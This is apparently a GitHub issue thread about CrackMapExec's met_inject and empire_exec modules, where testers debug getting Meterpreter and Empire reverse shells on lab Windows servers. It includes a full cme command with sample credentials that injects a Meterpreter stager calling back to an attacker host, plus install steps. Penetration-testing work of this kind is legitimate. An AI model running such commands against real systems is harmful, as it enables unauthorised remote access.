Closed mpgn closed 4 years ago
Alright, I'm not familiar with Empire https://github.com/BC-SECURITY/Empire/ nor with Metasploit, so if anyone is ready to help, we would appreciate it.
Maybe linked to https://github.com/byt3bl33d3r/CrackMapExec/issues/192 for Empire
Responded to the wrong issue earlier so moved it here. Tested the powershell-empire (BC-Security one) this morning with the latest cme and it worked for me. Ran from Kali Linux against a fresh install of Server 2016.
Nice @lolcatlolcat, since you have this module working with Empire BC-Security, can you update the CME wiki with the steps to make the module work (if something changed) so that @n0bl1nk and I can test it? Thanks
https://github.com/byt3bl33d3r/CrackMapExec/wiki/Getting-Shells-101#empire-agent
Absolutely, I can do that. I'm troubleshooting the msf one now too, hopefully I can get them both working.
I'm waiting for the wiki update.
Good!
I think there is something funky going on with met_inject that I'm just not smart enough to troubleshoot further. Even if I remove cme from the equation and just try to run the Inject-Shellcode manually on the target, I'm noticing that the process completely crashes. I wonder if that's causing the assertion error? Because it's not a clean close? I don't know enough about how Python handles sockets/TCP. I've tried both the reverse_http and reverse_https, no dice on either.
Yes, the code is broken. I use https://github.com/jaredhaight/Invoke-MetasploitPayload to make it work. Simpler, less broken, but not injected into memory.
Can you test and tell me what you think about this one @lolcatlolcat? https://github.com/byt3bl33d3r/CrackMapExec/wiki/Getting-Shells-101#meterpreter
You may want to use this command before git submodule update --recursive to add the submodule
Not working for me. I'm still getting assertion errors.
Can you check again? (you should have meterpreter working even with the error)
Don't know if it's a "me" thing. I tried cme and also tried just the Invoke-MetasploitPayload directly on the target (tried a Server 2016 box and a Win10) and it's not calling back to my MSF, but if I run the powershell directly (the posh that msf spits out) it works. So I'm guessing something isn't working right between the target <-> attacker (it very may well be VirtualBox not wanting to play nice or something.)
Try without SSL and try with a real IP for the binding not 0.0.0.0
w00t!
I had to modify the met_inject.py to allow the use of a non-https stager URL. Do you want me to PR and push?
STAGER module option
shellz
I tried the new method result :/
@n0bl1nk you need to checkout the v5-metasploit branch and get the Invoke-MetasploitPayload.ps1 version of met_inject
Ok yes, PAYLOAD=reverse_http, it's already included in the code: https://github.com/byt3bl33d3r/CrackMapExec/blob/v5-metasploit/cme/modules/met_inject.py#L30
I updated metasploit. But I think I am having problems because some dependencies are out of date in the system. I will update completely
Okay, keep me updated, you're an awesome beta tester :D
But since the payload is different than the stager (which is the URL used by the Invoke-MetasploitPayload.ps1), wouldn't it make sense to remove the confusion and rename it to reference the stager? In my case the "working" exploit was an http stager (the SRVHOST in msfconsole) + a windows/meterpreter/reverse_https payload.
You mean rename it to SRVHOST=https / SRVHOST=http or STAGER=https / STAGER=http instead of PAYLOAD?
Yup.
I renamed multiple variables
cme smb 192.168.255.131 -u administrator -p 'Password@123' -M met_inject -o SRVHOST=192.168.255.137 SRVPORT=1337 RAND=ddddddd
No option for windows/meterpreter/reverse_https. I tried the payload "multi/meterpreter/reverse_https", not working for me.
metasploit version
Updated all the packages. I am trying to fix it.
I will be honest, I don't understand the issue on your previous message :confused:
@n0bl1nk did you change the target from python to posh? set target 2 should give you the option.
:) I installed a new Linux. Let's do it step by step
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone -b v5-metasploit https://github.com/byt3bl33d3r/CrackMapExec.git
cd CrackMapExec && python3 setup.py install
Let's fix this first
I missed it, this works! Thanks
Everyting works for you @n0bl1nk ?
v5-metasploit did not work. I'm dealing with it
Installed it from 2 different virtual machines. The same problem in both.
Use the pre-compiled binaries provided and see if that works? Additionally, if you're going to clone from source, you need to follow the wiki and follow those instructions. Once you have it cloned/installed/running you can switch branches simply using git checkout whatever-branchname; you don't need to clone using the branch name.
I noticed something. I installed cme on Kali 2019.2 and it worked --
metasploit didn't work due to some issues after updating.
https://github.com/rubygems/rubygems/issues/3068 https://github.com/rapid7/metasploit-framework/issues/11597
I tried everything in these solutions, it didn't work, and I noticed that those who had successful results have the latest kernel version.
Ran these commands:
apt update && apt dist-upgrade
Kali 2019.2 -> Kali 2020 upgrade
metasploit worked but cme didn't work after these commands.
cme Errors:
kali version:
Please use this binary https://github.com/byt3bl33d3r/CrackMapExec/actions/runs/93393519
Tested everything, seems to be right. I didn't see any errors except 'lsassy'.
I didn't get a connection with met_inject. Details: Metasploit output:
cme met_inject output:
cme mimikatz output:
cme sam/lsa/ntds/X/x/spider work well.
Hey, it didn't work due to misuse so I fixed the above part.
I got a session: 1-
2-
3-
A warning message appears periodically. I will try to fix this. D:
Alright, meterpreter working; as for the error in metasploit, this is not related to CME so I'm closing the issue
Fix for ruby 2.7.x: line 79 --> self.raw_uri = URI.decode(md[2]) --> self.raw_uri = CGI.unescape(md[2]); replace with this and restart metasploit. Original post details: https://github.com/rapid7/metasploit-framework/pull/13363 happy ending 💯
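The URI.decode to CGI.unescape swap above is not a strict drop-in: CGI.unescape also turns '+' into a space, which the old decoder never did. Added example in Ruby (not code from Metasploit or CrackMapExec; SAMPLE_RAW_URI is a constructed stand-in for the captured md[2]) comparing the two decoders so the difference is visible:

```ruby
# Added example, not Metasploit or CrackMapExec code: compares the two
# decoders involved in the ruby 2.7 fix. URI.decode/URI.escape were
# deprecated in 2.7 (the periodic warning) and removed in 3.0.
begin
  require 'cgi'          # full library on Ruby <= 3.4
rescue LoadError
  require 'cgi/escape'   # newer Rubies keep only the escape helpers
end
require 'uri'

# Constructed stand-in for the captured raw request URI (the md[2] above).
SAMPLE_RAW_URI = '/a+b%2Fc%20d'.freeze

# The replacement used in the fix: CGI.unescape decodes %XX sequences
# AND turns '+' into a space (form-encoding semantics).
def unescape_cgi(raw)
  CGI.unescape(raw, Encoding::UTF_8)
end

# What URI.decode did: percent-decoding only, '+' is left untouched.
# URI::DEFAULT_PARSER.unescape is the non-deprecated way to get that.
def unescape_uri_parser(raw)
  URI::DEFAULT_PARSER.unescape(raw)
end

# Returns [cgi_result, parser_result, differ?] so a caller can check
# whether a given raw URI decodes differently under the two methods.
def compare_decoders(raw)
  a = unescape_cgi(raw)
  b = unescape_uri_parser(raw)
  [a, b, a != b]
end

if __FILE__ == $PROGRAM_NAME
  cgi, parser, differ = compare_decoders(SAMPLE_RAW_URI)
  puts "raw               : #{SAMPLE_RAW_URI}"
  puts "CGI.unescape      : #{cgi}"       # "/a b/c d"
  puts "URI parser        : #{parser}"    # "/a+b/c d"
  puts "decoders disagree : #{differ}"    # true
end
```

A raw URI with no '+' decodes identically under both, so a handler that only ever sees percent-encoded paths will not notice the change.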
Following an issue encountered by @n0bl1nk
But I still can't get a reverse shell with met_inject and empire_exec, why? There is a section in my blog post where I mentioned cme and I want to solve it.
empire_exec
met_inject
after running commands metasploit listener:
empire listener:
Target system Windows 2012 R2. I can successfully log in with metasploit psexec
cme can successfully run these and similar commands
Originally posted by @n0bl1nk in https://github.com/byt3bl33d3r/CrackMapExec/issues/355#issuecomment-621449439